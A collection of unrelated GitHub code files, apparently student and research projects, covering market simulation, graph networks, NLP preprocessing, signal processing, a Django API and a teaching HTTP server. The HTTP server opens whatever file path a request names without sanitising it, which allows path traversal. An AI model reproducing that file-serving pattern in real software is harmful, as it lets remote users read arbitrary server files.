{"seq_id":"1554201693","text":"#!/usr/bin/env python3\n# --------------------------------------------\n# marketplace.py\n# Author: Jacob Santelli and Ian Murray\n# --------------------------------------------\n\nimport pandas as pd\nimport numpy as np\n\n\n# takes a list of portfolio pandas DataFrames, returns them appended to one another\ndef append(portList):\n    df = portList[0]\n    for port in portList[1:]:\n        # DataFrame.append returns a new frame, so the result must be reassigned\n        df = df.append(port)\n    return df\n\n\ndef portSort(portFrame):\n    portFrame.sort_values(\"price\", inplace=True)\n\n\ndef sampleDemand(mean_demand, sd=0.03):\n    pass\n\n\ndef calcRevenue(df, price):\n    df['revenue'] = df['is_generating'] * \\\n        (df['mw'] * \\\n        (price - \\\n        df['fuelcost'] - df['varom'] - df['carbon']))\n    \n\n# ------------ SINGLE ITERATION ---------------\n# 1. Portfolios send prices\n# 2. All supply is sorted, which creates the supply curve\n# 3. Demand is sampled, and the inelastic demand intersects the supply curve at the marginal price\n# 4. 
For generating plants, return money back to portfolio based on supply they satisfied and inframarginal rents\n\n\ndef main():\n portfolios_data = pd.read_csv(\"./generator_info.csv\")\n # Drop missing values\n portfolios_data.dropna(inplace=True)\n portfolios_data[\"is_generating\"] = False\n portfolios_data[\"price\"] = np.random.randint(1, 6, size=portfolios_data.shape[0])\n\n simulate_hour(10800, portfolios_data)\n\n\ndef sample_demand(mu, sd=0.03):\n return np.random.normal(loc=mu, scale=sd)\n\n\ndef set_price_by_id(data, id, price):\n data_copy = data.copy()\n data_copy.loc[data_copy[\"id\"] == id, (\"price\")] = price\n return data_copy\n\n\ndef get_ids_of_portfolios(data, portfolio):\n data_copy = data.copy()\n return data_copy.loc[data_copy[\"portfolio\"] == portfolio, (\"id\")]\n\n\ndef simulate_hour(mean_demand, generator_data):\n sampled_demand = sample_demand(mean_demand)\n data_copy = generator_data.copy()\n data_copy[\"revenue\"] = 0\n\n # Sort data by price\n data_copy.sort_values(\"price\", ascending=True, inplace=True)\n\n # Get cumulative demand\n # data_copy['cumulative_capacity'] = data_copy.loc[:, ('mw')].cumsum()\n\n templist = data_copy.loc[:, (\"mw\")].cumsum()\n data_copy[\"cumulative_capacity\"] = templist\n\n # Get energy price for this hour\n data_copy[\"is_generating\"] = data_copy[\"cumulative_capacity\"] < sampled_demand\n\n # Marginal generator - need to cover entire demand (perfectly inelastic), so add final generator\n marg_gen_index = data_copy.loc[~data_copy[\"is_generating\"], :].index.values.tolist()[0]\n # (also set is_generating true for marg gen)\n data_copy.loc[data_copy.index == marg_gen_index, 'is_generating'] = True\n # Hour price\n hour_price = data_copy[data_copy.index == marg_gen_index]['price']\n \n # Get revenues of entire dataframe\n \n # If is_generating True, then calculate revenue on these\n return {'hour_price': hour_price, 'dataframe': data_copy.loc[data_copy['is_generating'], :]}\n\n\ndef sandbox():\n df = pd.DataFrame()\n\n portfolio_1 = {\"X\": 69.00, \"Y\": 500.00}\n # price of generating unit with ID X from portfolio 1\n portfolio_1[\"X\"]\n\n# set all of the generators from portfolio port\n# to a price defined by some arbitrary function\n# price_func by passing all relevant parameters\ndef set_portfolio_prices(data, price_func, port):\n data_copy = data.copy()\n list_of_ids = get_ids_of_portfolios(data_copy, port)\n\n for id in data_copy:\n if id in list_of_ids:\n data_copy[data_copy['id'] == id]['price'] = \\\n price_func(data_copy[data_copy['id'] == id]['mw'],\n data_copy[data_copy['id'] == id]['varom'],\n data_copy[data_copy['id'] == id]['carbon'],\n data_copy[data_copy['id'] == id]['varom'],\n data_copy[data_copy['id'] == id]['fixom'],\n )\n \n \n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jacob-santelli/ene422","sub_path":"marketplace.py","file_name":"marketplace.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27661047040","text":"from .model_wrapper import ModelWrapper\n#from models.PPGN_variants import new_data_format\nfrom models.PPGN import PPGN, CV_regression, param_search, CV_10\nfrom dataclasses import dataclass\nimport torch\n\nclass PPGNNewDataFormatWrapper(ModelWrapper):\n \n LEARNING_RATES = {'AIDS': 0.0001, 'COLLAB': 0.0001, 'IMDB-BINARY': 0.00005, 'IMDB-MULTI': 0.0001, 'MUTAG': 0.0001, 'NCI1':0.0001, 'NCI109':0.0001, 'PROTEINS': 0.001, 'PTC_FM': 0.0001, 'QM9': 0.0001}\n DECAY_RATES = 
{'AIDS': 1.0, 'COLLAB': 0.5, 'IMDB-BINARY': 0.5, 'IMDB-MULTI': 0.75, 'MUTAG': 1.0, 'NCI1':0.75, 'NCI109':0.75, 'PROTEINS': 0.5, 'PTC_FM': 1.0, 'QM9': 0.8}\n EPOCHS = {'AIDS': 500, 'COLLAB': 150, 'IMDB-BINARY': 100, 'IMDB-MULTI': 150, 'MUTAG': 500, 'NCI1': 200, 'NCI109': 250, 'PROTEINS': 100, 'PTC_FM': 400, 'QM9': 500}\n \n @dataclass\n class Config:\n lr = 0.0001\n decay = 0.5\n epochs = 100\n print_freq = 20\n batch_size = 64\n param_search = False\n verbose = False\n block_feat = 400\n num_blocks = 3\n depth = 2\n new_suffix = True\n version = 1\n \n config = Config()\n \n def __init__(self, dataset, config):\n if dataset in self.LEARNING_RATES:\n self.config.lr = self.LEARNING_RATES[dataset]\n self.config.decay = self.DECAY_RATES[dataset]\n self.config.epochs = self.EPOCHS[dataset]\n super(PPGNNewDataFormatWrapper, self).__init__(dataset, config)\n self.config.qm9 = self.qm9\n\n X, y = self.data[0]\n if self.config.qm9:\n self.config.input_size = X.shape[0]\n self.config.output_size = y.shape[1]\n else:\n self.config.input_size = X.shape[0]\n self.config.output_size = self.data.num_classes\n\n self.model = PPGN\n \n # transform a torch_geometric.data.Data object to the matrix needed for PPGNNewData-style models and *graph label*\n def transform_data(self, data):\n return self.transform(data)\n \n def run(self):\n # For now, we won't allow param search on qm9\n if self.qm9:\n accuracy = CV_regression(self.model, self.data, self.config)\n elif self.config.param_search:\n lr, decay, accuracy = param_search(self.model, self.data, self.config)\n print(f'\\nPARAMETER SEARCH COMPLETE. ACHIEVED BEST ACCURACY OF {accuracy} with lr={lr}, decay={decay}')\n else:\n accuracy = CV_10(self.model, self.data, self.config)\n return accuracy\n \n def transform(self, data):\n version = self.config.version\n if version == 3:\n return self.transformV3(data)\n num_nodes = data.num_nodes\n node_feats = data.x\n if node_feats is None:\n node_feats = torch.zeros((num_nodes, 1))\n num_node_feats = len(node_feats[0])\n edge_feats = data.edge_attr\n if edge_feats is None:\n edge_feats = torch.zeros((len(data.edge_index[0]), num_node_feats))\n edge_feats[:,0] = 1\n num_edge_feats = num_node_feats\n else:\n num_edge_feats = len(edge_feats[0])\n if num_edge_feats < num_node_feats:\n max_dim = num_node_feats\n diff = num_node_feats - num_edge_feats\n # Fill out edge_feats with extra dims\n edge_feats = torch.stack([torch.cat((e, torch.zeros(diff))) for e in edge_feats])\n elif num_node_feats < num_edge_feats:\n max_dim = num_edge_feats\n diff = num_edge_feats - num_node_feats\n node_feats = torch.stack([torch.cat((v, torch.zeros(diff))) for v in node_feats])\n else:\n max_dim = num_node_feats\n \n if version == 2:\n max_dim += 1\n \n mat = torch.zeros(num_nodes, num_nodes, max_dim)\n for edge_feat, v1, v2 in zip(edge_feats, data.edge_index[0], data.edge_index[1]):\n if version == 2:\n mat[v1][v2][0] = 1\n mat[v1][v2][1:] = edge_feat\n else:\n mat[v1][v2] = edge_feat\n \n for v1, node_feat in enumerate(node_feats):\n if version == 2:\n mat[v1][v1][1:] = node_feat\n else:\n mat[v1][v1] = node_feat\n \n y = data.y.squeeze()\n if y.dim() == 0 or len(y) == 1:\n y = int(y)\n return (mat.transpose(0, 1).transpose(0,2), y)\n \n def transformV3(self, data):\n num_nodes = data.num_nodes\n node_feats = data.x\n if node_feats is None:\n #node_feats = torch.zeros((num_nodes, 1))\n node_feats = []\n num_node_feats = 0\n else:\n num_node_feats = len(node_feats[0])\n num_aug_nodes = num_nodes + num_node_feats\n mat = 
torch.zeros(num_aug_nodes, num_aug_nodes, 1)\n for v1, v2 in zip(data.edge_index[0], data.edge_index[1]):\n mat[v1][v2] = torch.tensor([1])\n for v, node_feat in enumerate(node_feats):\n mat[v][num_nodes:] = node_feat.unsqueeze(1)\n \n y = data.y.squeeze()\n if y.dim() == 0 or len(y) == 1:\n y = int(y)\n return (mat.transpose(0, 1).transpose(0,2), y)\n","repo_name":"nathanlucaussy/provably-powerful-GNNs","sub_path":"model_wrappers/PPGN_new_data_format_wrapper.py","file_name":"PPGN_new_data_format_wrapper.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74836895093","text":"import os\nimport argparse\n\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef preprocessing(BASE_PATH, SAVE_PATH):\n question_lists, answer_lists = [], []\n all_data = []\n for fn in os.listdir(BASE_PATH):\n if os.path.splitext(fn)[-1] != '.xlsx':\n continue\n print(fn)\n data = pd.read_excel(os.path.join(BASE_PATH, fn))\n all_sentence, id_list = [], []\n for sentence, speaker_id in tqdm(zip(data[\"SENTENCE\"], data[\"SPEAKERID\"]), total=len(data)):\n all_sentence.append(str(sentence))\n id_list.append(speaker_id)\n\n questions, answers = [], []\n i = 0\n while i < len(all_sentence):\n end = i + 1\n _id = id_list[i]\n if end >= len(all_sentence):\n break\n while end < len(all_sentence) and id_list[end] == _id:\n end += 1\n if _id == 1:\n try:\n questions.append(\" \".join(all_sentence[i:end]) + \"\")\n except:\n print(i, end)\n break\n else:\n answers.append(\" \".join(all_sentence[i:end]) + \"\")\n i = end\n min_length = min(len(questions), len(answers))\n question_lists.extend(questions[:min_length])\n answer_lists.extend(answers[:min_length])\n for i in range(min_length):\n all_data.append(questions[i])\n all_data.append(answers[i])\n\n with open(SAVE_PATH, 'wt', encoding='utf-8') as f:\n for line in all_data:\n f.write(line + \"\\n\")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--data_dir', required=True,\n help=\"Your Data Directory Path\")\n parser.add_argument('--save_file', required=True,\n help=\"Save path extension : '.txt'\")\n\n args = parser.parse_args()\n\n DATA_PATH = args.data_dir\n SAVE_PATH = args.save_file\n\n preprocessing(DATA_PATH, SAVE_PATH)\n\n\nif __name__==\"__main__\":\n main()","repo_name":"pellto/comcom_online_task","sub_path":"finetune_code/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73378043251","text":"import math\nfrom typing import List\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom captum.attr import IntegratedGradients\n\nfrom scce.model.dataset import InputDataProcessingHelper\nfrom scce.model.net import load_network\n\n\ndef integrated_gradients(\n model_file, RNA_values: List[np.array], gene_names: List[str]\n) -> pd.DataFrame:\n checkpoint, model = load_network(model_file)\n model.cuda()\n model.eval()\n ig = IntegratedGradients(model)\n\n input_raw_length, kernel_size, input_size, output_size = (\n checkpoint[\"input_raw_length\"],\n checkpoint[\"kernel_size\"],\n checkpoint[\"input_size\"],\n checkpoint[\"output_size\"],\n )\n helper = InputDataProcessingHelper(input_raw_length, kernel_size)\n\n scores = torch.zeros(math.prod(input_size))\n for RNA_value in RNA_values:\n input = helper.do(RNA_value.copy())\n input = torch.Tensor(input).cuda().unsqueeze(0).unsqueeze(0)\n\n 
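        # Note (added): Captum's IntegratedGradients needs an explicit target
        # when the model output has more than one dimension, so each output
        # unit (0, i) is attributed separately below; attribute() returns a
        # tensor shaped like the unsqueezed input, which is flattened and
        # accumulated into a single per-gene score vector.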
for i in range(output_size):\n            attributions = ig.attribute(input, target=(0, i))[0, 0].reshape(-1)\n            scores += attributions.cpu().detach()\n\n    scores = pd.DataFrame(scores, index=gene_names[: len(scores)], columns=[\"score\"])\n    return scores\n","repo_name":"LMH0066/SEE","sub_path":"scce/analyse/attribution.py","file_name":"attribution.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"26990282090","text":"import re\r\nn = int(input())\r\npattern = r\"^[+-]?[0-9]*\\.[0-9]+$\"\r\n\"\"\"^ anchors the match at the start\r\n[] defines a set of characters\r\n? means zero or one occurrence\r\n* means zero or more occurrences\r\n\\ escapes a special character\r\n+ means one or more occurrences\r\n$ anchors the match at the end\"\"\"\r\n\r\nfor i in range(n):\r\n    value = input()\r\n    print(bool(re.match(pattern, value)))","repo_name":"durgeshbhargava/INNOMATICS_DataScience_Internship","sub_path":"Task - 5 (RegEx)/5.1 Detect Floating Point Number.py","file_name":"5.1 Detect Floating Point Number.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"1832008751","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom pyper import R\nimport os\nfrom PreProcess import processTweet, is_ascii\n\n\nclass supervisedLDA:\n\n    def __init__(self, dataFileName, alpha=1.0, numtopics=5, eta=0.1, logistic=True, lamda=1.0, e_iter=10, m_iter=4, variance=0.25, cutoff=0.25):\n        model_filename = 'model_%s.RDS' % dataFileName\n        vocab_filename = 'vocabulary_%s.RDS' % dataFileName\n        fullpath = os.path.realpath(__file__)\n        (path, files) = os.path.split(fullpath)\n        self.path = path\n        self.params = {\n            'numtopics': numtopics,\n            'alpha': alpha,\n            'eta': eta,\n            'logistic': logistic,\n            'lambda': lamda,\n            'e_iter': e_iter,\n            'm_iter': m_iter,\n            'variance': variance,\n            'OutputName': dataFileName,\n            'model_filename': model_filename,\n            'vocab_filename': vocab_filename,\n            'test_cutoff': cutoff,\n        }\n        self.r = R(use_pandas=True, use_numpy=True)\n        self.assign_R_params()\n\n    def set_param(self, param_name, param_value):\n        self.params[param_name] = param_value\n\n    def get_params(self, deep=False):\n        return self.params\n\n    def assign_R_params(self):\n        for (key, value) in self.params.iteritems():\n            self.r.assign(key, value)\n\n    def fit(self, documents, labels):\n        (documents, labels) = self.transform(documents, labels)\n        self.r.assign('documents', documents)\n        self.r.assign('labels', labels)\n        self.r.run('source(\"trainLDA.R\")')\n        vocab = self.r['vocabulary']\n        self.set_param('vocabulary', vocab)\n        self.assign_R_params()\n\n    def transform(self, documents, labels):\n        documents = [(tweet if is_ascii(tweet) else ' ') for tweet in\n                     documents]\n        documents = map(lambda x: processTweet(x), documents)\n        documents = map(lambda x: str(x).translate(None, '\"'),\n                        documents)\n        (tweets_filtered, labels_filtered) = ([], [])\n        for (tweet, label) in zip(documents, labels):\n            if len(tweet) > 1:\n                tweets_filtered.append(tweet)\n                labels_filtered.append(label)\n        return (tweets_filtered, labels_filtered)\n\n    def test_transform(self, documents):\n        documents = [(tweet if is_ascii(tweet) else ' ') for tweet in\n                     documents]\n        documents = map(lambda x: processTweet(x), documents)\n        documents = map(lambda x: str(x).translate(None, '\"'),\n                        documents)\n        tweets_filtered = []\n        for tweet in documents:\n            if len(tweet) > 1:\n                tweets_filtered.append(tweet)\n        return tweets_filtered\n\n    def __str__(self):\n        return 'sLDA(cut:%s)' % 
self.params['test_cutoff']\n\n def predict(self, documents, gold_labels):\n (documents, gold_labels) = self.transform(documents,\n gold_labels)\n self.r.assign('testDocuments', documents)\n self.r.run('source(\"testLDA.R\")')\n predictions = self.r['pred']\n cutoff = self.params['test_cutoff']\n predictions = map(lambda x: int(x > cutoff), predictions)\n return (predictions, gold_labels)\n\n def save_model(self):\n self.r.run('source(\"%s/saveModel.R\")' % self.path)\n\n def load_model(self):\n self.r.run('source(\"%s/loadModel.R\")' % self.path)\n vocab = self.r['vocab']\n topics = self.r['topics']\n self.set_param('vocab', vocab)\n self.set_param('topics', topics)\n self.assign_R_params()\n","repo_name":"dssg/tweedr","sub_path":"tweedr/ml/pyslda/PySLDA.py","file_name":"PySLDA.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"21"} +{"seq_id":"4049564141","text":"# 1. Use the import statement to import a built-in package in Python. 2. Use the import statement to call a function present in another Python file.\nimport json\nfrom Python.employee import details, employee_name, age, title\n\ndef create_dict(name, age, title):\n employee_dict = {\n \"first_name\": str(name),\n \"age\" : int(age),\n \"title\" : str(title)\n }\n json_obj = json.dumps(employee_dict)\n return employee_dict\n\ndef write_json_to_file(json_obj, output_file):\n newfile = open(output_file, 'w')\n newfile.write(str(json_obj))\n newfile.close()\n return","repo_name":"tgilly93/BEND_Coursera","sub_path":"Python/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13310946139","text":"import numpy as np\r\n\r\nfin = './exercise_2_input.dat' # Input file name\r\n\r\ny = np.loadtxt(fin) # Read data from file into NumPy array named data\r\n\r\n# Set some parameters\r\ndx = 2.0 # Data spacing\r\nnx = len(y) # Determines number of data points\r\n\r\nwave_length = 200.0\r\nk = 2*np.pi/wave_length # Wavenumber\r\nx = dx*np.arange(0,nx) # X values for calculating analytic derivative\r\nanalytic = -(k**2)*np.sin(k*x) # Analytic derivative\r\n\r\nsecond = np.zeros_like(analytic) # forward\r\nsecond.fill(None)\r\nfourth = np.copy(second) # fourth-order\r\n\r\n#Calculate standard difference\r\nfor i in range(1, nx-1): # Note: n starts at 1, not 0\r\n second[i] = (y[i+1]+y[i-1]-2*y[i])/(dx**2)\r\n\r\n#Calculate fourth-order difference\r\nfor i in range(2, nx-2):\r\n fourth[i] = (1/dx**2)*(((4/3)*(y[i+1] + y[i-1])) - ((1/12) * (y[i+2] + y[i-2])) - ((5/2) * y[i]))\r\n\r\n# Print results\r\ns = '{0:3s} {1:12s} {2:12s} {3:12s}'.format(' ', ' analytic',' second', ' fourth')\r\nprint(s)\r\nfor i, a in enumerate(analytic):\r\n s = '{0:3d} {1:12.9f} {2:12.9f} {3:12.9f}'.format(i,a,second[i],fourth[i])\r\n print(s)","repo_name":"unCl0ud/ESCI445","sub_path":"2/2-2.py","file_name":"2-2.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1552162592","text":"import json\nimport sys\nimport os\nfrom collections import defaultdict\nfrom itertools import combinations\nfrom operator import add\nfrom mrjob.job import MRJob\n\nclass TitleIndex(MRJob):\n def mapper(self, _, line):\n \n self.increment_counter('posts', 'count', 1)\n \n text_term_counts = defaultdict(int)\n \n post = json.loads(line.strip())\n post_id = int(post['id'])\n 
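        # Note (added): each title bigram below is canonicalised by sorting
        # its two tokens and joining them with a space, so ('b', 'a') and
        # ('a', 'b') count toward the same inverted-index key.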
title_bigrams = post['title_bigrams']\n        \n        for bigram in title_bigrams:\n            text_term_counts[' '.join(sorted(bigram))] += 1\n        \n        for term in text_term_counts:\n            yield (term, post_id)\n    \n    def combiner(self, term, values):\n        # values is a stream of individual post ids yielded by the mapper\n        yield (term, list(values))\n    \n    \n    def reducer(self, term, values):\n        self.increment_counter('title_bigrams', 'count', 1)\n        # a value is a list of ids when a combiner ran, or a bare id when it did not\n        posting_list = []\n        for value in values:\n            if isinstance(value, list):\n                posting_list.extend(value)\n            else:\n                posting_list.append(value)\n        yield (term, posting_list)\n    \n    \nif __name__ == '__main__':\n    TitleIndex.run()\n","repo_name":"rottentomato56/kaggle-fb-stackoverflow","sub_path":"Final/title_term_index.py","file_name":"title_term_index.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"14434997609","text":"import pyttsx3\r\nimport PyPDF2\r\nbook = open('pdf path','rb')\r\npdfReader = PyPDF2.PdfFileReader(book)\r\npages = pdfReader.numPages\r\n# print(pages) to print the number of pages in the pdf\r\nspeaker = pyttsx3.init()\r\nfor num in range(0,pages):\r\n    pa = pdfReader.getPage(num)\r\n    text = pa.extractText()\r\n    speaker.say(text)\r\n    speaker.runAndWait()\r\n","repo_name":"Manoj-3868/python-projects","sub_path":"pdftoaudiobook/pdftoaudiobook.py","file_name":"pdftoaudiobook.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"33631668900","text":"from rest_framework import generics\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.views import status\nfrom django_filters import rest_framework as filters\nfrom django.db.models import QuerySet\nfrom .models import Suit, Price\nfrom .serializers import SuitSerializer\nfrom .filters import SuitFilter\n\n\nclass BadRequest(APIException):\n    status_code = status.HTTP_400_BAD_REQUEST\n    default_detail = 'Bad request'\n    default_code = 'bad_request'\n\n    def __init__(self, description=None, *args, **kwargs):\n        if description is not None:\n            self.default_detail = description\n        super().__init__()\n\n\nclass ListSuitsView(generics.ListAPIView):\n    filter_backends = (filters.DjangoFilterBackend,)\n    filter_class = SuitFilter\n    \"\"\"\n    Provides a get method handler.\n    \"\"\"\n    queryset = Suit.objects.all()\n    serializer_class = SuitSerializer\n\n    @staticmethod\n    def is_filtering_by_currency(currency, min_price, max_price):\n        if currency and not min_price and not max_price:\n            suit_ids: QuerySet = Price.objects.filter(currency=currency).values_list('suit_id', flat=True)\n            return Suit.objects.filter(url__in=suit_ids)\n\n    def get_queryset(self):\n        \"\"\"\n        This view should return a list of all the suits.\n        The currency, min_price and max_price filters are handled manually because they are custom:\n        they act on the nested prices serializer, see serializer.py also.\n        \"\"\"\n        currency = self.request.query_params.get('currency')\n        min_price = self.request.query_params.get('min_price')\n        max_price = self.request.query_params.get('max_price')\n\n        # use the returned queryset when only a currency filter is given\n        currency_queryset = self.is_filtering_by_currency(currency, min_price, max_price)\n        if currency_queryset is not None:\n            return currency_queryset\n\n        if min_price or max_price:\n            if not currency:\n                raise BadRequest('min_price and max_price filters require currency query parameter to be specified')\n\n            if min_price and not max_price:\n                suit_ids: QuerySet = Price.objects.filter(\n                    currency=currency,\n                    amount__gte=min_price\n                ).values_list('suit_id', flat=True)\n\n                return Suit.objects.filter(url__in=suit_ids)\n            elif max_price and not min_price:\n                suit_ids: QuerySet = Price.objects.filter(\n                    currency=currency,\n                    amount__lte=max_price\n                
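                # Note (added): max_price-only branch -- keep suits that have
                # at least one Price row in this currency at or below the cap.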
).values_list('suit_id', flat=True)\n\n return Suit.objects.filter(url__in=suit_ids)\n elif min_price and max_price:\n suit_ids: QuerySet = Price.objects.filter(\n currency=currency,\n amount__gte=min_price,\n amount__lte=max_price\n ).values_list('suit_id', flat=True)\n\n return Suit.objects.filter(url__in=suit_ids)\n\n if currency:\n suit_ids: QuerySet = Price.objects.filter(currency=currency).values_list('suit_id', flat=True)\n return Suit.objects.filter(url__in=suit_ids)\n\n return Suit.objects.all()\n","repo_name":"lucaronca/suits-api","sub_path":"apps/scraped_suits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73593888374","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef gera_bitstream(tamanho):\n return np.random.randint(2, size=tamanho)\n\ndef gera_sinal_ASK(T, snr, fc, fb_ASK):\n fs = 20 * fc\n t = np.arange(0, T, 1 / fs)\n Nb_ASK = int(fb_ASK * T)\n m_ASK = gera_bitstream(Nb_ASK)\n m_ASKp = np.repeat(m_ASK, int(fs / fb_ASK)) \n z_ASK = m_ASKp * np.exp(1j * 2 * np.pi * fc * t)\n z_ASK_noise = adiciona_ruido(z_ASK, snr)\n return t, m_ASKp, z_ASK_noise, m_ASK\n\ndef adiciona_ruido(sinal, snr):\n SNR_dB = snr\n noise_power = 10 ** (-SNR_dB / 10)\n noise_real = np.sqrt(noise_power / 2) * np.random.normal(0, 1, len(sinal))\n noise_imag = np.sqrt(noise_power / 2) * np.random.normal(0, 1, len(sinal))\n return sinal + noise_real + (1j * noise_imag)\n\ndef intdump(x, factor):\n return x[::factor]\n\ndef recupera_sinal_ASK(t, sinal_modulado, fc, fb_ASK, fs):\n m_ASKp_r = sinal_modulado * np.exp(-1j * 2 * np.pi * fc * t)\n n_samp = int(fs / fb_ASK)\n m_ASK_r = np.round(intdump(m_ASKp_r, n_samp))\n return m_ASK_r\n\ndef calcula_BER(sinal_original, sinal_recuperado):\n bit_errors = np.sum(np.abs(sinal_original - sinal_recuperado))\n BER = bit_errors / len(m_ASK)\n return BER\n\ndef plota_sinais_tempo(t, sinal_baseband, sinal_modulado):\n plt.figure(1)\n plt.subplot(2, 1, 1)\n plt.plot(t, np.real(sinal_baseband))\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Sinal no Domínio do Tempo (Baseband)')\n plt.grid()\n\n plt.figure(2)\n plt.subplot(2, 1, 1)\n plt.plot(t, np.real(sinal_modulado))\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Sinal no Domínio do Tempo (Modulado)')\n plt.grid()\n\ndef plota_espectro(f, espectro_sinal_baseband, espectro_sinal_modulado):\n plt.figure(1)\n plt.subplot(2, 1, 2)\n plt.plot(f, np.real(espectro_sinal_baseband))\n plt.grid()\n\n plt.figure(2)\n plt.subplot(2, 1, 2)\n plt.plot(f, np.real(espectro_sinal_modulado))\n plt.grid()\n\nif __name__ == \"__main__\":\n T = 1\n snr = 10\n fc = 13.56e5\n fs = 20 * fc\n fb_ASK = 10e2\n\n t, sinal_baseband, sinal_modulado, m_ASK = gera_sinal_ASK(T, snr, fc, fb_ASK)\n m_ASK_r = recupera_sinal_ASK(t, sinal_modulado, fc, fb_ASK, fs)\n BER = calcula_BER(m_ASK, m_ASK_r)\n\n print(\"Taxa de Erro de Bit (BER): {:.5f}\".format(BER))\n\n df = 20 * 13.56e5 / len(t)\n f = (np.arange(0, len(t)) * df - 20 * 13.56e5 / 2)\n\n Z_ASKp = np.fft.fftshift(20 * np.log10(np.abs(np.fft.fft(sinal_baseband) + 1e-10)))\n Z_ASK = np.fft.fftshift(20 * np.log10(np.abs(np.fft.fft(sinal_modulado) + 1e-10)))\n\n\n plota_sinais_tempo(t, sinal_baseband, sinal_modulado)\n plota_espectro(f, Z_ASKp, Z_ASK)\n \n 
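    # Note (added): the spectra plotted above are magnitude spectra in dB,
    # 20*log10(|FFT|), with a 1e-10 floor inside the log to avoid log(0) and
    # np.fft.fftshift to centre DC at 0 Hz on the frequency axis f. As a
    # sketch, the same recipe for any signal s is:
    #   S_dB = np.fft.fftshift(20 * np.log10(np.abs(np.fft.fft(s)) + 1e-10))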
plt.show()\n","repo_name":"dev-victordias/iot","sub_path":"Simulations/NFC_simulator.py","file_name":"NFC_simulator.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"35119932843","text":"# ## EXERCISES ##\n# 1 - Implement an HTTP server with the http.server module that serves different pages, using the code analyzed in class as a base.\n# 2 - Use links to navigate between the different pages.\n\nimport http.server\nimport socketserver\nimport urllib.parse\n\n# GET / HTTP/1.1\n\nPORT = 1111\n\n\nclass handler_manual (http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        if self.path == '/':\n            self.path = '/index.html'\n\n        try:\n            with open(self.path[1:], 'rb') as file:\n                content = file.read()\n            \n            self.send_response(200)\n            self.send_header('Content-Type', 'text/html')\n            self.end_headers()\n            self.wfile.write(content)\n\n        except FileNotFoundError:\n            self.send_error(404, 'Archivo no encontrado')\n        \n\n    def do_POST(self):\n        if self.path == '/submit_form':\n            input_data=self.rfile.read(int(self.headers['Content-Length']))\n            print(\"INPUT DATA: \", input_data)\n            \n            response_content = \"¡Formulario enviado correctamente!\"\n            self.send_response(200)\n            self.send_header('Content-Type', 'text/html')\n            self.end_headers()\n            self.wfile.write(response_content.encode('utf-8'))\n        else:\n            self.send_error(404, 'Página no encontrada') \n\n\n    \n    \n\n\nsocketserver.TCPServer.allow_reuse_address = True\n\n#myhttphandler = http.server.BaseHTTPRequestHandler\n#myhttphandler = http.server.SimpleHTTPRequestHandler\nmyhttphandler = handler_manual\n\n\n#httpd = socketserver.TCPServer((\"\", PORT), myhttphandler)\nhttpd = http.server.HTTPServer((\"\", PORT), myhttphandler)\n#httpd = http.server.ThreadingHTTPServer((\"\", PORT), myhttphandler)\n\nprint(f\"Opening httpd server at port {PORT}\")\n\nhttpd.serve_forever()\n\nhttpd.shutdown()","repo_name":"AugustoKark/Computacion2_AK2023","sub_path":"Ejercicios_Clases/Clase17/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
